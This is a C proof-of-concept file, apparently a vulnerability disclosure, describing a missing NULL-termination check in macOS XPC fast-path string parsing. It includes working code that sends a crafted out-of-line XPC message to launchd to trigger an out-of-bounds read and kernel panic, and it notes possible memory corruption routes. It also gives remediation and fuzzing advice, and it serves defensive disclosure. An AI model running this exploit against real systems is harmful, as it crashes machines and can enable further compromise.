// ianbeer
#if 0
XPC fast path fails to ensure NULL termination of XPC strings, leading to memory disclosure/corruption vulnerabilities in XPC services

XPC has a fast past mode which doesn't parse messages up-front, instead searching for keys and values
inside the serialized message when they are first requested.

In order for a received XPC message to be parsed in fast mode it must not have any OOL ports (and the
receiving code must not force slow mode.) 

It's important that slow-mode and fast mode have the same semantics; but for xpc_strings they don't.

Specifically, the slow-mode xpc_string deserializer _xpc_string_deserialize ensures that the
deserialized xpc_string is NULL terminated. The fast-path deserializer, reachable via
xpc_dictionary_get_string, doesn't enforce this. By sending a crafted XPC message you can force
the receiver to get a char* pointer to a string which isn't NULL terminated.

xpc_dictionary_get_string directly calls xpc_string_get_wire_value for the fast-path case, which reads
the length from the serialized message then only ensures that that much data is left in the
serializer. It doesn't check that the last byte is NULL, unlike the slow-path deserializer,
which adds another check in xpc_string_deserialize.

There are a few tricks needed to make this at least a bit interesting :)

Firstly, you will likely need to get interesting data past the end of the string.
To do this you need to send the serialized body of the xpc message out-of-line. The fast-path deserializer
is still invoked in this case, as long as this OOL descriptor is the only descriptor in the message.
By sending the body out-of-line like this you can ensure that the serialized xpc string ends right at the end of a
page boundary, meaning other allocations (eg malloc regions, other vm_allocate'd memory etc) will immediately follow
the non-null terminated xpc_string buffer.

Secondly, you need to find somewhere where either a string is reflected back to the sender, or the length is trusted
and then used in some dangerous way if the underlying string length were to change (because the NULL byte is being read
out-of-bounds.) These seem to occur across various system daemons. Launchd seems to have at least one case which may
lead to memory corruption where an xpc string gets passed to strlen, a heap allocation is made based on that size,
then strcpy is using to copy the xpc string contents to that heap buffer*(a). If the location of the terminating, OOB-read
NULL byte could by changed inbetween the strlen and the strcpy (either as a side-effect of the malloc, or by other threads)
then this could cause memory corruption.

This PoC just triggers a kernel panic due to an OOB read in launchd; reversing launchd to actually hit these more interesting
paths is an effort in itself, but this should be enough to demonstrate that the XPC code is wrong, and there is security impact.

Remediation tips:
I believe the correct fix here is to move the NULL-byte check currently in xpc_string_deserialize one level lower in to
_xpc_string_get_wire_value

Hardening tips:
This issue might be harder than expected to trigger via fuzzing if you are only fuzzing for crashes; you would need the
xpc message to be serialized in a way similar to this PoC, with an OOL body and an xpc string ending at the end of a page.

It would have surfaced pretty quickly though via differential fuzzing, that is, by fuzzing the slow and fast paths
"against each other". This means generating random, serialized XPC messages and the ensure that the parsed objects fully match.
A crash would then be replaced by a case where the output didn't match (eg the fast path returned an object, but the slow-path
returned an error.)

XPC is a pretty fundamental layer for iOS/MacOS security, I would also consider a source audit.

*(a) in the 10.14.6 build of launchd, I'm pretty sure 1000336B8 can be reached with such a string.
     launchd is a nightmare to reverse though, and not my current project. Symbols would be much appriciated ;)
#endif

#include <stdio.h>
#include <stdlib.h>

#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <sys/types.h>
#include <launch.h>
#include <unistd.h>
#include <paths.h>
#include <uuid/uuid.h>

#include <xpc/xpc.h>

#include "liboxpc/oxpc.h"

mach_msg_header_t* receive_msg(mach_port_t port) {
  mach_msg_header_t* msg = calloc(sizeof(mach_msg_header_t), 1);

  kern_return_t err;
  err = mach_msg(msg,
                 MACH_RCV_MSG | MACH_RCV_LARGE,
                 0,
                 sizeof(mach_msg_header_t),
                 port,
                 MACH_MSG_TIMEOUT_NONE,
                 MACH_PORT_NULL);

  if (err == KERN_SUCCESS) {
    return msg;
  }

  if (err != MACH_RCV_TOO_LARGE) {
    printf("unknown error receiving message: %x %s\n", err, mach_error_string(err));
    return NULL;
  }

  mach_msg_size_t size = msg->msgh_size + MAX_TRAILER_SIZE;

  free(msg);

  msg = calloc(size, 1);

  err = mach_msg(msg,
                 MACH_RCV_MSG | MACH_RCV_LARGE,
                 0,
                 size,
                 port,
                 MACH_MSG_TIMEOUT_NONE,
                 MACH_PORT_NULL);

  if (err == KERN_SUCCESS) {
    return msg;
  }

  printf("unsupported error receiving with a bigger buffer %x %s\n", err, mach_error_string(err));

  return NULL;
}

xpc_object_t get_bootstrap_pipe() {
  struct _os_alloc_once_s {
    long once;
    void *ptr;
  };

  extern struct _os_alloc_once_s _os_alloc_once_table[];

  struct xpc_global_data {
    uint64_t a;
    uint64_t xpc_flags;
    mach_port_t task_bootstrap_port;
    xpc_object_t xpc_bootstrap_pipe;
  };

  struct xpc_global_data *xpc_global_data = _os_alloc_once_table[1].ptr;

  return xpc_global_data->xpc_bootstrap_pipe;
}

extern int xpc_pipe_routine(xpc_object_t xpc_pipe_obj, xpc_object_t dict, xpc_object_t* reply);

void* build_data(int len) {
  uint32_t* buf = malloc(len);
  memset(buf, '/', len);
  buf[1] = 0x10;
  return buf;
}


// from: https://github.com/bazad/blanket/blob/master/blanket_payload/bootstrap_port.c
static mach_port_t
lookup_bootstrap_port() {
	// Retrieve the ports launchd registered using mach_ports_register().
	mach_port_t *init_ports;
	mach_msg_type_number_t init_port_count;
	kern_return_t kr = mach_ports_lookup(mach_task_self(), &init_ports, &init_port_count);
	if (kr != KERN_SUCCESS || init_port_count == 0) {
		return MACH_PORT_NULL;
	}
	// The first registered port is the bootstrap port.
	mach_port_t bootstrap = init_ports[0];
	// Deallocate the other ports.
	for (size_t i = 1; i < init_port_count; i++) {
		mach_port_deallocate(mach_task_self(), init_ports[i]);
	}
	// Deallocate the memory.
	vm_deallocate(mach_task_self(), (vm_address_t)init_ports,
			init_port_count * sizeof(*init_ports));
	// Return the bootstrap port.
	return bootstrap;
}

extern mach_port_t thread_get_special_reply_port();

__attribute__((always_inline))
static __inline__ void*
_os_tsd_get_direct(unsigned long slot)
{
    void *ret;
    __asm__("mov %%gs:%1, %0" : "=r" (ret) : "m" (*(void **)(slot * sizeof(void *))));
    return ret;
}

mach_port_t find_special_reply_port() {
  return (mach_port_t)_os_tsd_get_direct(8);
}

oxpc_object_t build_request(int len) {
  printf("build request\n");
  oxpc_object_t dict = oxpc_dictionary_alloc();

  oxpc_dictionary_append(dict, "subsystem", oxpc_uint64_alloc(5));  // 3 & 206 was getting somehwere
  oxpc_dictionary_append(dict, "routine", oxpc_uint64_alloc(206));

  oxpc_dictionary_append(dict, "handle", oxpc_uint64_alloc(0));
  oxpc_dictionary_append(dict, "type", oxpc_uint64_alloc(7));
  oxpc_dictionary_append(dict, "label", oxpc_string_alloc_with_cstring("label"));

  oxpc_dictionary_append(dict, "flags", oxpc_uint64_alloc(0));

  uint8_t* str = malloc(len);
  memset(str, 'B', len);

  oxpc_dictionary_append(dict, "name", oxpc_string_alloc(str, len));
  return dict;
}

void do_bad_string(mach_port_t target_port) {
  kern_return_t err;

  printf("pid: %d\n", getpid());

  // many ways to find the bootstrap port
  uint8_t* obj = (uint8_t*)get_bootstrap_pipe();
  mach_port_t launchd_xpc_port = *(mach_port_t*)(obj+0x30);
  
  mach_port_t bp = lookup_bootstrap_port();


  printf("launchd_xpc_port: 0x%x, bp = 0x%x\n", launchd_xpc_port, bp);

  oxpc_object_t req = build_request(0x40000-0xa4);//(0x3ff9c);

  mach_port_t reply_port = MACH_PORT_NULL;

  reply_port = find_special_reply_port();

  if (reply_port == MACH_PORT_NULL) {
    reply_port = thread_get_special_reply_port();
  }
  printf("reply port: 0x%x\n", reply_port);

  oxpc_port_list_t port_list = NULL;
  mach_msg_size_t ool_buf_size = 0;
  uint8_t* ool_buf = oxpc_object_serialize_with_header(req,
                                                       &ool_buf_size,
                                                       &port_list);

  printf("ool_buf: %p, ool_buf_size:0x%x\n", ool_buf, ool_buf_size);

  // copy that in to a vm_allocated buffer...
  void* addr = 0;
  err = mach_vm_allocate(mach_task_self(),
                         (mach_vm_address_t*)&addr,
                         (ool_buf_size+0x3fff) & (~0x3fff),
                         VM_FLAGS_ANYWHERE);

  if (err != KERN_SUCCESS) {
    printf("failed to vm_allocate memory\n");
    return;
  }

  memcpy(addr, ool_buf, ool_buf_size);

  mach_msg_size_t out_msg_size = 0;
  mach_msg_header_t* msg = oxpc_build_mach_message(addr,
                                                   ool_buf_size,
                                                   1,
                                                   port_list,
                                                   bp,
                                                   reply_port,
                                                   &out_msg_size);

  // send the message:
  err = mach_msg_send(msg);
  if (err != KERN_SUCCESS) {
    printf("failed to send message with OOL body %x %s\n", err, mach_error_string(err));
    return;
  } else {
    printf("sent message\n");
  }

  // wait to receive a reply:
  mach_msg_header_t* reply_msg = malloc(0x1000);
  memset(reply_msg, 0, 0x1000);
  reply_msg->msgh_size = 0x1000;
  reply_msg->msgh_local_port = reply_port;

  err = mach_msg_receive(reply_msg);
  if (err != KERN_SUCCESS) {
    printf("failed to receive reply\n");
  } else {
    printf("received reply\n");
  }
}

int main() {
  do_bad_string(0);
  return 0;
}
